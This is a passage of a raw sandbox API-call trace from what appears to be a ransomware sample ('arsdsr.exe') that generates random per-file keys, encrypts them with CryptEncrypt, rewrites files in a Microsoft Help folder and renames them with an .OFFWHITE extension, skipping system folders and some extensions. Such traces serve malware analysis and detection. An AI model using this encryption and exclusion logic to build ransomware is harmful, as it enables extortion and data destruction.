Help\\MS.MSTORE.14.1033.hxn.OFFWHITE" [0147.496] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft Help\\MS.MSTORE.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.mstore.14.1033.hxn"), lpNewFileName="C:/Users\\All Users\\Microsoft Help\\MS.MSTORE.14.1033.hxn.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft help\\ms.mstore.14.1033.hxn.offwhite")) returned 1 [0147.497] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xef377f10, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef377f10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef3ea330, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x13a, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="MS.OIS.14.1033.hxn", cAlternateFileName="MSOIS1~1.HXN")) returned 1 [0147.497] lstrcmpiW (lpString1="MS.OIS.14.1033.hxn", lpString2=".") returned 1 [0147.497] lstrcmpiW (lpString1="MS.OIS.14.1033.hxn", lpString2="..") returned 1 [0147.497] lstrcmpiW (lpString1="MS.OIS.14.1033.hxn", lpString2="...") returned 1 [0147.497] lstrcmpiW (lpString1="MS.OIS.14.1033.hxn", lpString2="windows") returned -1 [0147.497] lstrcmpiW (lpString1="MS.OIS.14.1033.hxn", lpString2="$recycle.bin") returned 1 [0147.497] lstrcmpiW (lpString1="MS.OIS.14.1033.hxn", lpString2="rsa") returned -1 [0147.497] lstrcmpiW (lpString1="MS.OIS.14.1033.hxn", lpString2="ntuser.dat") returned -1 [0147.497] lstrcmpiW (lpString1="MS.OIS.14.1033.hxn", lpString2="programdata") returned -1 [0147.497] lstrcmpiW (lpString1="MS.OIS.14.1033.hxn", lpString2="appdata") returned 1 [0147.497] lstrcmpiW (lpString1="MS.OIS.14.1033.hxn", lpString2="program files") returned -1 [0147.497] lstrcmpiW (lpString1="MS.OIS.14.1033.hxn", lpString2="program files (x86)") returned -1 [0147.497] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Microsoft Help\\" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\") returned="C:/Users\\All Users\\Microsoft Help\\" [0147.497] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft Help\\", lpString2="MS.OIS.14.1033.hxn" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.OIS.14.1033.hxn") returned="C:/Users\\All Users\\Microsoft Help\\MS.OIS.14.1033.hxn" [0147.497] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.497] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.497] PathFindExtensionW (pszPath="MS.OIS.14.1033.hxn") returned=".hxn" [0147.497] lstrcmpiW (lpString1=".hxn", lpString2=".exe") returned 1 [0147.497] lstrcmpiW (lpString1=".hxn", lpString2=".log") returned -1 [0147.497] lstrcmpiW (lpString1=".hxn", lpString2=".cab") returned 1 [0147.497] lstrcmpiW (lpString1=".hxn", lpString2=".cmd") returned 1 [0147.498] lstrcmpiW (lpString1=".hxn", lpString2=".com") returned 1 [0147.498] lstrcmpiW (lpString1=".hxn", lpString2=".cpl") returned 1 [0147.498] lstrcmpiW (lpString1=".hxn", lpString2=".ini") returned -1 [0147.498] lstrcmpiW (lpString1=".hxn", lpString2=".dll") returned 1 [0147.498] lstrcmpiW (lpString1=".hxn", lpString2=".url") returned -1 [0147.498] lstrcmpiW (lpString1=".hxn", lpString2=".ttf") returned -1 [0147.498] lstrcmpiW (lpString1=".hxn", lpString2=".mp3") returned -1 [0147.498] lstrcmpiW (lpString1=".hxn", lpString2=".pif") returned -1 [0147.498] lstrcmpiW (lpString1=".hxn", lpString2=".mp4") returned -1 [0147.498] lstrcmpiW (lpString1=".hxn", lpString2=".OFFWHITE") returned -1 [0147.498] lstrcmpiW (lpString1=".hxn", lpString2=".msi") returned -1 [0147.498] lstrcmpiW (lpString1="MS.OIS.14.1033.hxn", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0147.498] GetProcessHeap () returned 0x500000 [0147.498] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x526c48 [0147.498] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft Help\\MS.OIS.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.ois.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0147.498] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=314) returned 1 [0147.499] GetProcessHeap () returned 0x500000 [0147.499] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b80 [0147.499] GetProcessHeap () returned 0x500000 [0147.499] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b68 [0147.499] GetProcessHeap () returned 0x500000 [0147.499] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565f98 [0147.499] GetProcessHeap () returned 0x500000 [0147.499] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565e90 [0147.499] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.499] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.499] SystemFunction036 (in: RandomBuffer=0x543b80, RandomBufferLength=0x10 | out: RandomBuffer=0x543b80) returned 1 [0147.499] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.499] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.499] SystemFunction036 (in: RandomBuffer=0x543b68, RandomBufferLength=0x10 | out: RandomBuffer=0x543b68) returned 1 [0147.499] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.499] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.499] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565f98*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x565f98*, pdwDataLen=0x295e310*=0x100) returned 1 [0147.499] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.499] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.499] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565e90*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x565e90*, pdwDataLen=0x295e30c*=0x100) returned 1 [0147.500] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x13a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.500] SetLastError (dwErrCode=0x0) [0147.500] WriteFile (in: hFile=0xb0, lpBuffer=0x565f98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565f98*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0147.501] GetLastError () returned 0x0 [0147.501] GetLastError () returned 0x0 [0147.501] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x23a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.501] WriteFile (in: hFile=0xb0, lpBuffer=0x565e90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565e90*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0147.501] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x33a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.501] WriteFile (in: hFile=0xb0, lpBuffer=0x526c48*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x526c48*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0147.501] GetProcessHeap () returned 0x500000 [0147.501] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x13a) returned 0x51d650 [0147.502] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.502] ReadFile (in: hFile=0xb0, lpBuffer=0x51d650, nNumberOfBytesToRead=0x13a, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x51d650*, lpNumberOfBytesRead=0x295e540*=0x13a, lpOverlapped=0x0) returned 1 [0147.502] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.502] WriteFile (in: hFile=0xb0, lpBuffer=0x51d650*, nNumberOfBytesToWrite=0x13a, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x51d650*, lpNumberOfBytesWritten=0x295e54c*=0x13a, lpOverlapped=0x0) returned 1 [0147.502] GetProcessHeap () returned 0x500000 [0147.502] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x51d650 | out: hHeap=0x500000) returned 1 [0147.502] CloseHandle (hObject=0xb0) returned 1 [0147.502] GetProcessHeap () returned 0x500000 [0147.502] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565f98 | out: hHeap=0x500000) returned 1 [0147.502] GetProcessHeap () returned 0x500000 [0147.502] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565e90 | out: hHeap=0x500000) returned 1 [0147.502] GetProcessHeap () returned 0x500000 [0147.502] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b80 | out: hHeap=0x500000) returned 1 [0147.502] GetProcessHeap () returned 0x500000 [0147.502] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b68 | out: hHeap=0x500000) returned 1 [0147.502] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\All Users\\Microsoft Help\\MS.OIS.14.1033.hxn" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.OIS.14.1033.hxn") returned="C:/Users\\All Users\\Microsoft Help\\MS.OIS.14.1033.hxn" [0147.502] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.OIS.14.1033.hxn", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.OIS.14.1033.hxn.OFFWHITE") returned="C:/Users\\All Users\\Microsoft Help\\MS.OIS.14.1033.hxn.OFFWHITE" [0147.502] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft Help\\MS.OIS.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.ois.14.1033.hxn"), lpNewFileName="C:/Users\\All Users\\Microsoft Help\\MS.OIS.14.1033.hxn.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft help\\ms.ois.14.1033.hxn.offwhite")) returned 1 [0147.503] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xc997810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xc997810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc9e3ad0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x152, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="MS.ONENOTE.14.1033.hxn", cAlternateFileName="MSONEN~1.HXN")) returned 1 [0147.503] lstrcmpiW (lpString1="MS.ONENOTE.14.1033.hxn", lpString2=".") returned 1 [0147.503] lstrcmpiW (lpString1="MS.ONENOTE.14.1033.hxn", lpString2="..") returned 1 [0147.503] lstrcmpiW (lpString1="MS.ONENOTE.14.1033.hxn", lpString2="...") returned 1 [0147.503] lstrcmpiW (lpString1="MS.ONENOTE.14.1033.hxn", lpString2="windows") returned -1 [0147.503] lstrcmpiW (lpString1="MS.ONENOTE.14.1033.hxn", lpString2="$recycle.bin") returned 1 [0147.503] lstrcmpiW (lpString1="MS.ONENOTE.14.1033.hxn", lpString2="rsa") returned -1 [0147.503] lstrcmpiW (lpString1="MS.ONENOTE.14.1033.hxn", lpString2="ntuser.dat") returned -1 [0147.503] lstrcmpiW (lpString1="MS.ONENOTE.14.1033.hxn", lpString2="programdata") returned -1 [0147.503] lstrcmpiW (lpString1="MS.ONENOTE.14.1033.hxn", lpString2="appdata") returned 1 [0147.503] lstrcmpiW (lpString1="MS.ONENOTE.14.1033.hxn", lpString2="program files") returned -1 [0147.503] lstrcmpiW (lpString1="MS.ONENOTE.14.1033.hxn", lpString2="program files (x86)") returned -1 [0147.503] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Microsoft Help\\" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\") returned="C:/Users\\All Users\\Microsoft Help\\" [0147.503] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft Help\\", lpString2="MS.ONENOTE.14.1033.hxn" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.ONENOTE.14.1033.hxn") returned="C:/Users\\All Users\\Microsoft Help\\MS.ONENOTE.14.1033.hxn" [0147.503] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.503] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.503] PathFindExtensionW (pszPath="MS.ONENOTE.14.1033.hxn") returned=".hxn" [0147.503] lstrcmpiW (lpString1=".hxn", lpString2=".exe") returned 1 [0147.503] lstrcmpiW (lpString1=".hxn", lpString2=".log") returned -1 [0147.503] lstrcmpiW (lpString1=".hxn", lpString2=".cab") returned 1 [0147.503] lstrcmpiW (lpString1=".hxn", lpString2=".cmd") returned 1 [0147.503] lstrcmpiW (lpString1=".hxn", lpString2=".com") returned 1 [0147.503] lstrcmpiW (lpString1=".hxn", lpString2=".cpl") returned 1 [0147.503] lstrcmpiW (lpString1=".hxn", lpString2=".ini") returned -1 [0147.503] lstrcmpiW (lpString1=".hxn", lpString2=".dll") returned 1 [0147.503] lstrcmpiW (lpString1=".hxn", lpString2=".url") returned -1 [0147.503] lstrcmpiW (lpString1=".hxn", lpString2=".ttf") returned -1 [0147.503] lstrcmpiW (lpString1=".hxn", lpString2=".mp3") returned -1 [0147.504] lstrcmpiW (lpString1=".hxn", lpString2=".pif") returned -1 [0147.504] lstrcmpiW (lpString1=".hxn", lpString2=".mp4") returned -1 [0147.504] lstrcmpiW (lpString1=".hxn", lpString2=".OFFWHITE") returned -1 [0147.504] lstrcmpiW (lpString1=".hxn", lpString2=".msi") returned -1 [0147.504] lstrcmpiW (lpString1="MS.ONENOTE.14.1033.hxn", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0147.504] GetProcessHeap () returned 0x500000 [0147.504] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x526c58 [0147.504] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft Help\\MS.ONENOTE.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.onenote.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0147.510] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=338) returned 1 [0147.510] GetProcessHeap () returned 0x500000 [0147.510] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b68 [0147.510] GetProcessHeap () returned 0x500000 [0147.510] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b80 [0147.510] GetProcessHeap () returned 0x500000 [0147.510] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565e90 [0147.511] GetProcessHeap () returned 0x500000 [0147.511] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565f98 [0147.511] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.511] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.511] SystemFunction036 (in: RandomBuffer=0x543b68, RandomBufferLength=0x10 | out: RandomBuffer=0x543b68) returned 1 [0147.511] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.511] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.511] SystemFunction036 (in: RandomBuffer=0x543b80, RandomBufferLength=0x10 | out: RandomBuffer=0x543b80) returned 1 [0147.511] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.511] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.511] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565e90*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x565e90*, pdwDataLen=0x295e310*=0x100) returned 1 [0147.511] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.511] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.511] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565f98*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x565f98*, pdwDataLen=0x295e30c*=0x100) returned 1 [0147.512] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x152, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.512] SetLastError (dwErrCode=0x0) [0147.512] WriteFile (in: hFile=0xb0, lpBuffer=0x565e90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565e90*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0147.513] GetLastError () returned 0x0 [0147.513] GetLastError () returned 0x0 [0147.513] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x252, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.513] WriteFile (in: hFile=0xb0, lpBuffer=0x565f98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565f98*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0147.513] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x352, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.513] WriteFile (in: hFile=0xb0, lpBuffer=0x526c58*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x526c58*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0147.514] GetProcessHeap () returned 0x500000 [0147.514] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x152) returned 0x51d650 [0147.514] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.514] ReadFile (in: hFile=0xb0, lpBuffer=0x51d650, nNumberOfBytesToRead=0x152, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x51d650*, lpNumberOfBytesRead=0x295e540*=0x152, lpOverlapped=0x0) returned 1 [0147.514] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.514] WriteFile (in: hFile=0xb0, lpBuffer=0x51d650*, nNumberOfBytesToWrite=0x152, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x51d650*, lpNumberOfBytesWritten=0x295e54c*=0x152, lpOverlapped=0x0) returned 1 [0147.514] GetProcessHeap () returned 0x500000 [0147.514] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x51d650 | out: hHeap=0x500000) returned 1 [0147.514] CloseHandle (hObject=0xb0) returned 1 [0147.514] GetProcessHeap () returned 0x500000 [0147.514] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565e90 | out: hHeap=0x500000) returned 1 [0147.514] GetProcessHeap () returned 0x500000 [0147.514] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565f98 | out: hHeap=0x500000) returned 1 [0147.514] GetProcessHeap () returned 0x500000 [0147.514] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b68 | out: hHeap=0x500000) returned 1 [0147.514] GetProcessHeap () returned 0x500000 [0147.514] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b80 | out: hHeap=0x500000) returned 1 [0147.515] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\All Users\\Microsoft Help\\MS.ONENOTE.14.1033.hxn" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.ONENOTE.14.1033.hxn") returned="C:/Users\\All Users\\Microsoft Help\\MS.ONENOTE.14.1033.hxn" [0147.515] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.ONENOTE.14.1033.hxn.OFFWHITE") returned="C:/Users\\All Users\\Microsoft Help\\MS.ONENOTE.14.1033.hxn.OFFWHITE" [0147.515] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft Help\\MS.ONENOTE.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.onenote.14.1033.hxn"), lpNewFileName="C:/Users\\All Users\\Microsoft Help\\MS.ONENOTE.14.1033.hxn.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft help\\ms.onenote.14.1033.hxn.offwhite")) returned 1 [0147.516] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x25328b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x25328b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2689510, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x152, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="MS.OUTLOOK.14.1033.hxn", cAlternateFileName="MSOUTL~1.HXN")) returned 1 [0147.516] lstrcmpiW (lpString1="MS.OUTLOOK.14.1033.hxn", lpString2=".") returned 1 [0147.516] lstrcmpiW (lpString1="MS.OUTLOOK.14.1033.hxn", lpString2="..") returned 1 [0147.516] lstrcmpiW (lpString1="MS.OUTLOOK.14.1033.hxn", lpString2="...") returned 1 [0147.516] lstrcmpiW (lpString1="MS.OUTLOOK.14.1033.hxn", lpString2="windows") returned -1 [0147.516] lstrcmpiW (lpString1="MS.OUTLOOK.14.1033.hxn", lpString2="$recycle.bin") returned 1 [0147.516] lstrcmpiW (lpString1="MS.OUTLOOK.14.1033.hxn", lpString2="rsa") returned -1 [0147.516] lstrcmpiW (lpString1="MS.OUTLOOK.14.1033.hxn", lpString2="ntuser.dat") returned -1 [0147.516] lstrcmpiW (lpString1="MS.OUTLOOK.14.1033.hxn", lpString2="programdata") returned -1 [0147.516] lstrcmpiW (lpString1="MS.OUTLOOK.14.1033.hxn", lpString2="appdata") returned 1 [0147.516] lstrcmpiW (lpString1="MS.OUTLOOK.14.1033.hxn", lpString2="program files") returned -1 [0147.516] lstrcmpiW (lpString1="MS.OUTLOOK.14.1033.hxn", lpString2="program files (x86)") returned -1 [0147.516] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Microsoft Help\\" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\") returned="C:/Users\\All Users\\Microsoft Help\\" [0147.516] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft Help\\", lpString2="MS.OUTLOOK.14.1033.hxn" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn") returned="C:/Users\\All Users\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn" [0147.516] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.516] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.516] PathFindExtensionW (pszPath="MS.OUTLOOK.14.1033.hxn") returned=".hxn" [0147.516] lstrcmpiW (lpString1=".hxn", lpString2=".exe") returned 1 [0147.516] lstrcmpiW (lpString1=".hxn", lpString2=".log") returned -1 [0147.516] lstrcmpiW (lpString1=".hxn", lpString2=".cab") returned 1 [0147.516] lstrcmpiW (lpString1=".hxn", lpString2=".cmd") returned 1 [0147.516] lstrcmpiW (lpString1=".hxn", lpString2=".com") returned 1 [0147.516] lstrcmpiW (lpString1=".hxn", lpString2=".cpl") returned 1 [0147.516] lstrcmpiW (lpString1=".hxn", lpString2=".ini") returned -1 [0147.517] lstrcmpiW (lpString1=".hxn", lpString2=".dll") returned 1 [0147.517] lstrcmpiW (lpString1=".hxn", lpString2=".url") returned -1 [0147.517] lstrcmpiW (lpString1=".hxn", lpString2=".ttf") returned -1 [0147.517] lstrcmpiW (lpString1=".hxn", lpString2=".mp3") returned -1 [0147.517] lstrcmpiW (lpString1=".hxn", lpString2=".pif") returned -1 [0147.517] lstrcmpiW (lpString1=".hxn", lpString2=".mp4") returned -1 [0147.517] lstrcmpiW (lpString1=".hxn", lpString2=".OFFWHITE") returned -1 [0147.517] lstrcmpiW (lpString1=".hxn", lpString2=".msi") returned -1 [0147.517] lstrcmpiW (lpString1="MS.OUTLOOK.14.1033.hxn", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0147.517] GetProcessHeap () returned 0x500000 [0147.517] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x526c68 [0147.517] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.outlook.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0147.524] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=338) returned 1 [0147.524] GetProcessHeap () returned 0x500000 [0147.524] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b80 [0147.524] GetProcessHeap () returned 0x500000 [0147.524] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b68 [0147.524] GetProcessHeap () returned 0x500000 [0147.524] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565f98 [0147.524] GetProcessHeap () returned 0x500000 [0147.524] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565e90 [0147.524] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.524] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.524] SystemFunction036 (in: RandomBuffer=0x543b80, RandomBufferLength=0x10 | out: RandomBuffer=0x543b80) returned 1 [0147.524] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.524] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.524] SystemFunction036 (in: RandomBuffer=0x543b68, RandomBufferLength=0x10 | out: RandomBuffer=0x543b68) returned 1 [0147.525] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.525] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.525] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565f98*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x565f98*, pdwDataLen=0x295e310*=0x100) returned 1 [0147.525] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.525] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.525] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, 